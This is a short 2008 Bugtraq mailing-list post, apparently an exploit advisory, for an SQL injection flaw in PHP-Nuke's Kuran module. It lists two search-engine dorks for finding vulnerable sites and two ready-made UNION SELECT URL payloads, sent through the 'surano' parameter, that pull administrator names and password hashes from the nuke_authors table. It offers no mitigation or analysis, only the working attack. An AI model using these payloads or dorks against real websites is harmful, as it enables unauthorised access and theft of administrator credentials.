
Date: 23 Feb 2008 13:30:42 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: php-nuke Kuran SQL Injection(surano)

###############################################################
# 
#   php-nuke Kuran SQL Injection(surano)
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MA&#304;L : hackturkiye.hackturkiye@...il.com
#        
################################################################
# 
#  DORK 1 : allinurl:  "modules php name Kuran"surano
# 
#  DORK 2 : allinurl:  "modules php name Kuran"
#
################################################################
   EXPLOIT : 

admin  

modules.php?name=Kuran&action=viewayat&surano=-0000/**/union+select/**/0,aid,0,0,0/**/from/**/nuke_authors/*where%20admin1

pass

modules.php?name=Kuran&action=viewayat&surano=-0000/**/union+select/**/0,pwd,0,0,0/**/from/**/nuke_authors/*where%20admin1


################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################
